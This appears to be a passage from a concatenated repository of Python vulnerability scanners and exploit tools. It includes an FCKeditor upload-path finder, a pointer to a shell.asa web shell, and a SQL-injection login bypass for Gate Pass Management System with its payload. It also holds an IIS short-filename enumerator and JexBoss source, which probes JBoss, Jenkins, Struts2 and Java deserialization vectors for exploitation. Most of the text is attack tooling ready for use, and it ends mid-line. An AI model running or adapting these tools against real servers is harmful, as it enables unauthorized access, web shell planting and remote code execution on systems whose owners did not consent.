'/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 37 | '/editor/filemanager/connectors/cfm/connector.cfm?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 38 | '/editor/filemanager/connectors/lasso/connector.lasso?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 39 | '/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 40 | '/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/' 41 | '/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F', 42 | '/FCKeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F', 43 | '/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F' 44 | ) 45 | try: 46 | for url in urls: 47 | url = URL + url 48 | 49 | verify_response = requests.get(url, headers=headers) 50 | html = verify_response.content.decode('utf-8') 51 | soup = re.search(r'', html) 52 | print("[+]此Fckeditor上传路径为:" + soup.group()) 53 | break 54 | except: 55 | print('[-]获取此Fckeditor上传路径错误') 56 | 57 | #print('[+]获取文件上传目录2.5 2.6:'+URL+'/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F') 58 | 59 | 60 | 61 | if __name__ == "__main__": 62 | attack() 63 | 64 | -------------------------------------------------------------------------------- /fckeditor/shell.asa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1120362990/vulnerability-list/ef35be4029f4e7160e64d8339f9e43513a7fc40f/fckeditor/shell.asa -------------------------------------------------------------------------------- /gatepass_vuln/Gate_Pass_Management_System_login_SQL_Injection.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import requests 4 | 5 | ''' 6 | Gate Pass Management System 2.1 - 'login' SQL Injection 7 | 发现时间:2018-11-02 8 | 参考:https://www.exploit-db.com/exploits/45766/ 9 | moon.py -u gatepass http:xx.xx.xx.xx:xx 登录界面 10 | ''' 11 | 12 | def attack(URL): 13 | print('[+]开始检测-Gate_Pass_Management_System_login_SQL_Injection。[+]') 14 | url = URL + '/login-exec.php' 15 | data = { 16 | #'login': 'admin','password': '123456', 17 | 'login': r"'or 1=1 or ''='", 'password': r"'or 1=1 or ''='", 18 | 'Submit': 'value', 19 | } 20 | try: 21 | r = requests.post(url,data=data) 22 | if 'Please check your username and password' in r.text: 23 | print('[-]账户密码错误,绕过登录失败,不存在漏洞。') 24 | print('检测页面:'+url) 25 | elif 'Industronics Engineering' in r.text: 26 | print('[+]绕过登录成功,存在sql注入漏洞。') 27 | print('漏洞连接:'+url) 28 | print("利用方法:login='or 1=1 or ''='&password='or 1=1 or ''='&Submit=Login") 29 | else: 30 | print('[!]检测时发生错误,可能不存在漏洞页面。') 31 | except: 32 | print('[!]连接端口时发生错误。') 33 | print('[+]检测完成-Gate_Pass_Management_System_login_SQL_Injection。[+]') 34 | print('\n') 35 | if __name__ == "__main__": 36 | attack() 37 | -------------------------------------------------------------------------------- /gatepass_vuln/Main_gatepass.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection 3 | 4 | 5 | def exec(URL): 6 | gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /gatepass_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /iis/Main_iis.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import iis.iis_shortname_Scan 3 | import os 4 | 5 | def exec(URL): 6 | # print('[+]开始检测-IIS短文件名漏洞。[+]') 7 | # #切换工作路径 8 | # os.chdir('iis') 9 | # os.system("py -2 iis_shortname_Scan.py "+URL) 10 | # print('[+]检测完成-IIS短文件名漏洞。[+]') 11 | 12 | iis.iis_shortname_Scan.attack(URL) 13 | 14 | if __name__ == "__main__": 15 | exec() 16 | -------------------------------------------------------------------------------- /iis/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /iis/iis_shortname_Scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding:utf-8 3 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com 4 | 5 | 6 | import sys 7 | import http.client 8 | from urllib.parse import urlparse 9 | import threading 10 | import queue 11 | import time 12 | 13 | 14 | class Scanner(): 15 | def __init__(self, target): 16 | self.target = target.lower() 17 | if not self.target.startswith('http'): 18 | self.target = 'http://%s' % self.target 19 | self.scheme, self.netloc, self.path, params, query, fragment = \ 20 | urlparse(target) 21 | if self.path[-1:] != '/': # ends with slash 22 | self.path += '/' 23 | self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-' 24 | self.files = [] 25 | self.dirs = [] 26 | self.queue = queue.Queue() 27 | self.lock = threading.Lock() 28 | self.threads = [] 29 | self.request_method = '' 30 | self.msg_queue = queue.Queue() 31 | self.STOP_ME = False 32 | threading.Thread(target=self._print).start() 33 | 34 | def _conn(self): 35 | try: 36 | if self.scheme == 'https': 37 | conn = http.client.HTTPSConnection(self.netloc) 38 | else: 39 | conn = http.client.HTTPConnection(self.netloc) 40 | return conn 41 | except Exception as e: 42 | print('[_conn.Exception]', e) 43 | return None 44 | 45 | def _get_status(self, path): 46 | try: 47 | conn = self._conn() 48 | conn.request(self.request_method, path) 49 | status = conn.getresponse().status 50 | conn.close() 51 | return status 52 | except Exception as e: 53 | raise Exception('[_get_status.Exception] %s' % str(e) ) 54 | 55 | def is_vul(self): 56 | try: 57 | for _method in ['GET', 'OPTIONS']: 58 | self.request_method = _method 59 | status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder 60 | status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder 61 | if status_1 == 404 and status_2 != 404: 62 | return True 63 | return False 64 | except Exception as e: 65 | raise Exception('[is_vul.Exception] %s' % str(e) ) 66 | 67 | def run(self): 68 | for c in self.alphanum: 69 | self.queue.put( (self.path + c, '.*') ) # filename, extension 70 | for i in range(20): 71 | t = threading.Thread(target=self._scan_worker) 72 | self.threads.append(t) 73 | t.start() 74 | for t in self.threads: 75 | t.join() 76 | self.STOP_ME = True 77 | 78 | def report(self): 79 | print('-'* 64) 80 | for d in self.dirs: 81 | print('Dir: %s' % d) 82 | for f in self.files: 83 | print('File: %s' % f) 84 | print('-'*64) 85 | print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files))) 86 | print('Note that * is a wildcard, matches any character zero or more times.') 87 | 88 | def _print(self): 89 | while not self.STOP_ME or (not self.msg_queue.empty()): 90 | if self.msg_queue.empty(): 91 | time.sleep(0.05) 92 | else: 93 | print(self.msg_queue.get()) 94 | 95 | def _scan_worker(self): 96 | while True: 97 | try: 98 | url, ext = self.queue.get(timeout=1.0) 99 | status = self._get_status(url + '*~1' + ext + '/1.aspx') 100 | if status == 404: 101 | self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext)) 102 | 103 | if len(url) - len(self.path)< 6: # enum first 6 chars only 104 | for c in self.alphanum: 105 | self.queue.put( (url + c, ext) ) 106 | else: 107 | if ext == '.*': 108 | self.queue.put( (url, '') ) 109 | 110 | if ext == '': 111 | self.dirs.append(url + '~1') 112 | self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]') 113 | 114 | elif len(ext) == 5 or (not ext.endswith('*')): # .asp* 115 | self.files.append(url + '~1' + ext) 116 | self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]') 117 | 118 | else: 119 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789': 120 | self.queue.put( (url, ext[:-1] + c + '*') ) 121 | if len(ext) < 4: # < len('.as*') 122 | self.queue.put( (url, ext[:-1] + c) ) 123 | 124 | except queue.Empty as e: 125 | break 126 | except Exception as e: 127 | print('[Exception]', e) 128 | 129 | 130 | def attack(URL): 131 | s = Scanner(URL) 132 | if not s.is_vul(): 133 | s.STOP_ME = True 134 | print('Server is not vulnerable') 135 | sys.exit(0) 136 | 137 | print('Server is vulnerable, please wait, scanning...') 138 | s.run() 139 | s.report() 140 | 141 | 142 | 143 | if __name__ == '__main__': 144 | attack() 145 | -------------------------------------------------------------------------------- /jboss/Main_jboss.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import jboss 4 | 5 | 6 | def exec(URL): 7 | print('[+]开始检测-jboss。[+]') 8 | # 切换工作路径 9 | os.chdir(os.path.realpath(__file__)[:35]) 10 | os.system("py -2 jexboss.py -host "+URL) 11 | print('[+]检测结束-jboss。[+]') 12 | 13 | 14 | if __name__ == "__main__": 15 | exec() 16 | -------------------------------------------------------------------------------- /jboss/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /jboss/_updates.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Module for managing updates to the JexBoss 4 | https://github.com/joaomatosf/jexboss 5 | 6 | Copyright 2013 João Filho Matos Figueiredo 7 | 8 | Licensed under the Apache License, Version 2.0 (the "License"); 9 | you may not use this file except in compliance with the License. 10 | You may obtain a copy of the License at 11 | 12 | http://www.apache.org/licenses/LICENSE-2.0 13 | 14 | Unless required by applicable law or agreed to in writing, software 15 | distributed under the License is distributed on an "AS IS" BASIS, 16 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 17 | See the License for the specific language governing permissions and 18 | limitations under the License. 19 | """ 20 | 21 | RED = '\x1b[91m' 22 | RED1 = '\033[31m' 23 | BLUE = '\033[94m' 24 | GREEN = '\033[32m' 25 | BOLD = '\033[1m' 26 | NORMAL = '\033[0m' 27 | ENDC = '\033[0m' 28 | 29 | import jexboss 30 | from sys import version_info 31 | import os 32 | import shutil 33 | from zipfile import ZipFile 34 | import traceback 35 | import logging, datetime 36 | logging.captureWarnings(True) 37 | FORMAT = "%(asctime)s (%(levelname)s): %(message)s" 38 | logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO) 39 | 40 | 41 | 42 | global gl_http_pool 43 | 44 | 45 | def set_http_pool(pool): 46 | global gl_http_pool 47 | gl_http_pool = pool 48 | 49 | 50 | def auto_update(): 51 | """ 52 | Download and deploy the latest version 53 | :return: True if successfully updated 54 | """ 55 | url = 'https://github.com/joaomatosf/jexboss/archive/master.zip' 56 | 57 | # backup of prior version7 58 | if os.path.exists('old_version'): 59 | shutil.rmtree('old_version') 60 | shutil.copytree(".", "." + os.path.sep + "old_version") 61 | 62 | # download and extract of new version 63 | jexboss.print_and_flush(GREEN + " * Downloading the new version from %s." %url +ENDC ) 64 | r = gl_http_pool.request('GET', url) 65 | if r.status != 200: 66 | jexboss.print_and_flush(RED + " * Error: Could not complete the download of the new version. Check your internet connection." + ENDC) 67 | return False 68 | with open('master.zip', 'wb') as f: 69 | f.write(r.data) 70 | z = ZipFile('master.zip', 'r') 71 | jexboss.print_and_flush(GREEN + " * Extracting new version..." +ENDC) 72 | z.extractall(path='.') 73 | z.close() 74 | os.remove('master.zip') 75 | path_new_version = '.' + os.path.sep + 'jexboss-master' 76 | jexboss.print_and_flush(GREEN + " * Replacing the current version with the new version..." + ENDC) 77 | for root, dirs, files in os.walk(path_new_version): 78 | for file in files: 79 | old_path = root.replace(path_new_version, '.') + os.path.sep 80 | old_file = root.replace(path_new_version, '.') + os.path.sep + file 81 | new_file = os.path.join(root, file) 82 | 83 | if not os.path.exists(old_path): 84 | os.makedirs(old_path) 85 | 86 | shutil.move(new_file, old_file) 87 | # remove extracted directory of the new version 88 | shutil.rmtree('.'+os.path.sep+'jexboss-master') 89 | 90 | return True 91 | 92 | 93 | def check_updates(): 94 | """ 95 | Checks if there is new version available 96 | :return: boolean if there updates 97 | """ 98 | url = 'http://joaomatosf.com/rnp/releases.txt' 99 | jexboss.print_and_flush(BLUE + " * Checking for updates in: %s **\n" % url + ENDC) 100 | header = {"User-Agent": "Checking for updates"} 101 | 102 | try: 103 | r = gl_http_pool.request('GET', url, redirect=False, headers=header) 104 | except: 105 | jexboss.print_and_flush(RED + " * Error: Failed to check for updates ...\n" + ENDC) 106 | logging.warning("Failed to check for updates.", exc_info=traceback) 107 | return False 108 | 109 | if r.status != 200: 110 | jexboss.print_and_flush(RED + " * Error: could not check for updates ...\n" + ENDC) 111 | logging.warning("Failed to check for updates. HTTP Code: %s" % r.status) 112 | return False 113 | else: 114 | current_version = jexboss.__version__ 115 | link = 'https://github.com/joaomatosf/jexboss/archive/master.zip' 116 | date_last_version = '' 117 | notes = [] 118 | # search for new versions 119 | resp = str(r.data).replace('\\n','\n') 120 | for line in resp.split('\n'): 121 | if "#" in line: 122 | continue 123 | if 'last_version' in line: 124 | last_version = line.split()[1] 125 | elif 'date:' in line: 126 | date_last_version = line.split()[1] 127 | elif 'link:' in line: 128 | link = line 129 | elif '* ' in line: 130 | notes.append(line) 131 | elif 'version:' in line and 'last_' not in line: 132 | break 133 | # compare last_version with current version 134 | tup = lambda x: [int(y) for y in (x + '.0.0.0').split('.')][:3] 135 | if tup(last_version) > tup(current_version): 136 | jexboss.print_and_flush ( 137 | GREEN + BOLD + " * NEW VERSION AVAILABLE: JexBoss v%s (%s)\n" % (last_version, date_last_version) + ENDC + 138 | GREEN + " * Link: %s\n" % link + 139 | GREEN + " * Release notes:") 140 | for note in notes: 141 | jexboss.print_and_flush (" %s" % note) 142 | return True 143 | else: 144 | return False -------------------------------------------------------------------------------- /jboss/jexboss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | """ 4 | JexBoss: Jboss verify and EXploitation Tool 5 | https://github.com/joaomatosf/jexboss 6 | 7 | Copyright 2013 João Filho Matos Figueiredo 8 | 9 | Licensed under the Apache License, Version 2.0 (the "License"); 10 | you may not use this file except in compliance with the License. 11 | You may obtain a copy of the License at 12 | 13 | http://www.apache.org/licenses/LICENSE-2.0 14 | 15 | Unless required by applicable law or agreed to in writing, software 16 | distributed under the License is distributed on an "AS IS" BASIS, 17 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 18 | See the License for the specific language governing permissions and 19 | limitations under the License. 20 | """ 21 | import textwrap 22 | import traceback 23 | import logging 24 | import datetime 25 | import signal 26 | import _exploits 27 | import _updates 28 | from os import name, system 29 | import os, sys 30 | import shutil 31 | from zipfile import ZipFile 32 | from time import sleep 33 | from random import randint 34 | import argparse, socket 35 | from sys import argv, exit, version_info 36 | logging.captureWarnings(True) 37 | FORMAT = "%(asctime)s (%(levelname)s): %(message)s" 38 | logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO) 39 | 40 | __author__ = "João Filho Matos Figueiredo " 41 | __version__ = "1.2.4" 42 | 43 | RED = '\x1b[91m' 44 | RED1 = '\033[31m' 45 | BLUE = '\033[94m' 46 | GREEN = '\033[32m' 47 | BOLD = '\033[1m' 48 | NORMAL = '\033[0m' 49 | ENDC = '\033[0m' 50 | 51 | 52 | def print_and_flush(message, same_line=False): 53 | if same_line: 54 | print (message), 55 | else: 56 | print (message) 57 | if not sys.stdout.isatty(): 58 | sys.stdout.flush() 59 | 60 | 61 | if version_info[0] == 2 and version_info[1] < 7: 62 | print_and_flush(RED1 + BOLD + "\n * You are using the Python version 2.6. The JexBoss requires version >= 2.7.\n" 63 | "" + GREEN + " Please install the Python version >= 2.7. \n\n" 64 | " Example for CentOS using Software Collections scl:\n" 65 | " # yum -y install centos-release-scl\n" 66 | " # yum -y install python27\n" 67 | " # scl enable python27 bash\n" + ENDC) 68 | logging.CRITICAL('Python version 2.6 is not supported.') 69 | exit(0) 70 | 71 | try: 72 | import readline 73 | readline.parse_and_bind('set editing-mode vi') 74 | except: 75 | logging.warning('Module readline not installed. The terminal will not support the arrow keys.', exc_info=traceback) 76 | print_and_flush(RED1 + "\n * Module readline not installed. The terminal will not support the arrow keys.\n" + ENDC) 77 | 78 | 79 | try: 80 | from urllib.parse import urlencode 81 | except ImportError: 82 | from urllib import urlencode 83 | 84 | try: 85 | from urllib3.util import parse_url 86 | from urllib3 import PoolManager 87 | from urllib3 import ProxyManager 88 | from urllib3 import make_headers 89 | from urllib3.util import Timeout 90 | except ImportError: 91 | print_and_flush(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n" 92 | "" + GREEN + " Example: \n" 93 | " # pip install -r requires.txt\n" + ENDC) 94 | logging.critical('Module urllib3 not installed. See details:', exc_info=traceback) 95 | exit(0) 96 | 97 | try: 98 | import ipaddress 99 | except: 100 | print_and_flush(RED1 + BOLD + "\n * Package ipaddress not installed. Please install the dependencies before continue.\n" 101 | "" + GREEN + " Example: \n" 102 | " # pip install -r requires.txt\n" + ENDC) 103 | logging.critical('Module ipaddress not installed. See details:', exc_info=traceback) 104 | exit(0) 105 | 106 | global gl_interrupted 107 | gl_interrupted = False 108 | global gl_args 109 | global gl_http_pool 110 | 111 | 112 | def get_random_user_agent(): 113 | user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0", 114 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", 115 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", 116 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9", 117 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36", 118 | "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0", 119 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", 120 | "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)", 121 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", 122 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0", 123 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36", 124 | "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17", 125 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0", 126 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"] 127 | return user_agents[randint(0, len(user_agents) - 1)] 128 | 129 | 130 | def is_proxy_ok(): 131 | print_and_flush(GREEN + "\n ** Checking proxy: %s **\n\n" % gl_args.proxy) 132 | 133 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 134 | "Connection": "keep-alive", 135 | "User-Agent": get_random_user_agent()} 136 | try: 137 | r = gl_http_pool.request('GET', gl_args.host, redirect=False, headers=headers) 138 | except: 139 | print_and_flush(RED + " * Error: Failed to connect to %s using proxy %s.\n" 140 | " See logs for more details...\n" %(gl_args.host,gl_args.proxy) + ENDC) 141 | logging.warning("Failed to connect to %s using proxy" %gl_args.host, exc_info=traceback) 142 | return False 143 | 144 | if r.status == 407: 145 | print_and_flush(RED + " * Error 407: Proxy authentication is required. \n" 146 | " Please enter the correct login and password for authentication. \n" 147 | " Example: -P http://proxy.com:3128 -L username:password\n" + ENDC) 148 | logging.error("Proxy authentication failed") 149 | return False 150 | 151 | elif r.status == 503 or r.status == 502: 152 | print_and_flush(RED + " * Error %s: The service %s is not availabel to your proxy. \n" 153 | " See logs for more details...\n" %(r.status,gl_args.host)+ENDC) 154 | logging.error("Service unavailable to your proxy") 155 | return False 156 | else: 157 | return True 158 | 159 | 160 | def configure_http_pool(): 161 | 162 | global gl_http_pool 163 | 164 | if gl_args.mode == 'auto-scan' or gl_args.mode == 'file-scan': 165 | timeout = Timeout(connect=1.0, read=3.0) 166 | else: 167 | timeout = Timeout(connect=gl_args.timeout, read=6.0) 168 | 169 | if gl_args.proxy: 170 | # when using proxy, protocol should be informed 171 | if (gl_args.host is not None and 'http' not in gl_args.host) or 'http' not in gl_args.proxy: 172 | print_and_flush(RED + " * When using proxy, you must specify the http or https protocol" 173 | " (eg. http://%s).\n\n" %(gl_args.host if 'http' not in gl_args.host else gl_args.proxy) +ENDC) 174 | logging.critical('Protocol not specified') 175 | exit(1) 176 | 177 | try: 178 | if gl_args.proxy_cred: 179 | headers = make_headers(proxy_basic_auth=gl_args.proxy_cred) 180 | gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, proxy_headers=headers, timeout=timeout, cert_reqs='CERT_NONE') 181 | else: 182 | gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, timeout=timeout, cert_reqs='CERT_NONE') 183 | except: 184 | print_and_flush(RED + " * An error occurred while setting the proxy. Please see log for details..\n\n" +ENDC) 185 | logging.critical('Error while setting the proxy', exc_info=traceback) 186 | exit(1) 187 | else: 188 | gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') 189 | 190 | 191 | def handler_interrupt(signum, frame): 192 | global gl_interrupted 193 | gl_interrupted = True 194 | print_and_flush ("Interrupting execution ...") 195 | logging.info("Interrupting execution ...") 196 | exit(1) 197 | 198 | signal.signal(signal.SIGINT, handler_interrupt) 199 | 200 | 201 | def check_connectivity(host, port): 202 | try: 203 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 204 | s.settimeout(2) 205 | s.connect((str(host), int(port))) 206 | s.close() 207 | except socket.timeout: 208 | logging.info("Failed to connect to %s:%s" %(host,port)) 209 | return False 210 | except: 211 | logging.info("Failed to connect to %s:%s" % (host, port)) 212 | return False 213 | 214 | return True 215 | 216 | 217 | def check_vul(url): 218 | """ 219 | Test if a GET to a URL is successful 220 | :param url: The URL to test 221 | :return: A dict with the exploit type as the keys, and the HTTP status code as the value 222 | """ 223 | url_check = parse_url(url) 224 | if '443' in str(url_check.port) and url_check.scheme != 'https': 225 | url = "https://"+str(url_check.host)+":"+str(url_check.port)+str(url_check.path) 226 | 227 | print_and_flush(GREEN + "\n ** Checking Host: %s **\n" % url) 228 | logging.info("Checking Host: %s" % url) 229 | 230 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 231 | "Connection": "keep-alive", 232 | "User-Agent": get_random_user_agent()} 233 | 234 | paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", 235 | "web-console": "/web-console/Invoker", 236 | "JMXInvokerServlet": "/invoker/JMXInvokerServlet", 237 | "admin-console": "/admin-console/", 238 | "Application Deserialization": "", 239 | "Servlet Deserialization" : "", 240 | "Jenkins": "", 241 | "Struts2": "", 242 | "JMX Tomcat" : ""} 243 | 244 | fatal_error = False 245 | 246 | for vector in paths: 247 | r = None 248 | if gl_interrupted: break 249 | try: 250 | 251 | # check jmx tomcat only if specifically chosen 252 | if (gl_args.jmxtomcat and vector != 'JMX Tomcat') or\ 253 | (not gl_args.jmxtomcat and vector == 'JMX Tomcat'): continue 254 | 255 | if gl_args.app_unserialize and vector != 'Application Deserialization': continue 256 | 257 | if gl_args.struts2 and vector != 'Struts2': continue 258 | 259 | if gl_args.servlet_unserialize and vector != 'Servlet Deserialization': continue 260 | 261 | if gl_args.jboss and vector not in ('jmx-console', 'web-console', 'JMXInvokerServlet', 'admin-console'): continue 262 | 263 | if gl_args.jenkins and vector != 'Jenkins': continue 264 | 265 | if gl_args.force: 266 | paths[vector] = 200 267 | continue 268 | 269 | print_and_flush(GREEN + " [*] Checking %s: %s" % (vector, " " * (27 - len(vector))) + ENDC, same_line=True) 270 | 271 | # check jenkins 272 | if vector == 'Jenkins': 273 | 274 | cli_port = None 275 | # check version and search for CLI-Port 276 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers) 277 | all_headers = r.getheaders() 278 | 279 | # versions > 658 are not vulnerable 280 | if 'X-Jenkins' in all_headers: 281 | version = int(all_headers['X-Jenkins'].split('.')[1].split('.')[0]) 282 | if version >= 638: 283 | paths[vector] = 505 284 | continue 285 | 286 | for h in all_headers: 287 | if 'CLI-Port' in h: 288 | cli_port = int(all_headers[h]) 289 | break 290 | 291 | if cli_port is not None: 292 | paths[vector] = 200 293 | else: 294 | paths[vector] = 505 295 | 296 | # chek vul for Java Unserializable in Application Parameters 297 | elif vector == 'Application Deserialization': 298 | 299 | r = gl_http_pool.request('GET', url, redirect=False, headers=headers) 300 | if r.status in (301, 302, 303, 307, 308): 301 | cookie = r.getheader('set-cookie') 302 | if cookie is not None: headers['Cookie'] = cookie 303 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers) 304 | # link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter) 305 | obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter) 306 | 307 | # if no obj serialized, check if there's a html refresh redirect and follow it 308 | if obj is None: 309 | # check if theres a redirect link 310 | link = _exploits.get_html_redirect_link(str(r.data)) 311 | 312 | # If it is a redirect link. Follow it 313 | if link is not None: 314 | r = gl_http_pool.request('GET', url + "/" + link, redirect=True, headers=headers) 315 | #link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter) 316 | obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter) 317 | 318 | # if obj does yet None 319 | if obj is None: 320 | # search for other params that can be exploited 321 | list_params = _exploits.get_list_params_with_serialized_objs(str(r.data)) 322 | if len(list_params) > 0: 323 | paths[vector] = 110 324 | print_and_flush(RED + " [ CHECK OTHER PARAMETERS ]" + ENDC) 325 | print_and_flush(RED + "\n * The \"%s\" parameter does not appear to be vulnerable.\n" %gl_args.post_parameter + 326 | " But there are other parameters that it seems to be xD!\n" +ENDC+GREEN+ 327 | BOLD+ "\n Try these other parameters: \n" +ENDC) 328 | for p in list_params: 329 | print_and_flush(GREEN + " -H %s" %p+ ENDC) 330 | print ("") 331 | elif obj is not None and obj == 'stateless': 332 | paths[vector] = 100 333 | elif obj is not None: 334 | paths[vector] = 200 335 | 336 | # chek vul for Java Unserializable in viewState 337 | elif vector == 'Servlet Deserialization': 338 | 339 | r = gl_http_pool.request('GET', url, redirect=False, headers=headers) 340 | if r.status in (301, 302, 303, 307, 308): 341 | cookie = r.getheader('set-cookie') 342 | if cookie is not None: headers['Cookie'] = cookie 343 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers) 344 | 345 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'): 346 | paths[vector] = 200 347 | else: 348 | paths[vector] = 505 349 | 350 | elif vector == 'Struts2': 351 | 352 | result = _exploits.exploit_struts2_jakarta_multipart(url, 'jexboss', gl_args.cookies) 353 | if result is None or "Could not get command" in str(result) : 354 | paths[vector] = 100 355 | elif 'jexboss' in str(result) and "" not in str(result).lower(): 356 | paths[vector] = 200 357 | else: 358 | paths[vector] = 505 359 | 360 | elif vector == 'JMX Tomcat': 361 | 362 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 363 | s.settimeout(7) 364 | host_rmi = url.split(':')[0] 365 | port_rmi = int(url.split(':')[1]) 366 | s.connect((host_rmi, port_rmi)) 367 | s.send(b"JRMI\x00\x02K") 368 | msg = s.recv(1024) 369 | octets = str(msg[3:]).split(".") 370 | if len(octets) != 4: 371 | paths[vector] = 505 372 | else: 373 | paths[vector] = 200 374 | 375 | # check jboss vectors 376 | elif vector == "JMXInvokerServlet": 377 | # user privided web-console path and checking JMXInvoker... 378 | if "/web-console/Invoker" in url: 379 | paths[vector] = 505 380 | # if the user not provided the path, append the "/invoker/JMXInvokerServlet" 381 | else: 382 | 383 | if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector])+"/"): 384 | url_to_check = url + str(paths[vector]) 385 | else: 386 | url_to_check = url 387 | 388 | r = gl_http_pool.request('HEAD', url_to_check , redirect=False, headers=headers) 389 | # if head method is not allowed/supported, try GET 390 | if r.status in (405, 406): 391 | r = gl_http_pool.request('GET', url_to_check , redirect=False, headers=headers) 392 | 393 | # if web-console/Invoker or invoker/JMXInvokerServlet 394 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'): 395 | paths[vector] = 200 396 | else: 397 | paths[vector] = 505 398 | 399 | elif vector == "web-console": 400 | # user privided JMXInvoker path and checking web-console... 401 | if "/invoker/JMXInvokerServlet" in url: 402 | paths[vector] = 505 403 | # if the user not provided the path, append the "/web-console/..." 404 | else: 405 | 406 | if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector]) + "/"): 407 | url_to_check = url + str(paths[vector]) 408 | else: 409 | url_to_check = url 410 | 411 | r = gl_http_pool.request('HEAD', url_to_check, redirect=False, headers=headers) 412 | # if head method is not allowed/supported, try GET 413 | if r.status in (405, 406): 414 | r = gl_http_pool.request('GET', url_to_check, redirect=False, headers=headers) 415 | 416 | # if web-console/Invoker or invoker/JMXInvokerServlet 417 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in 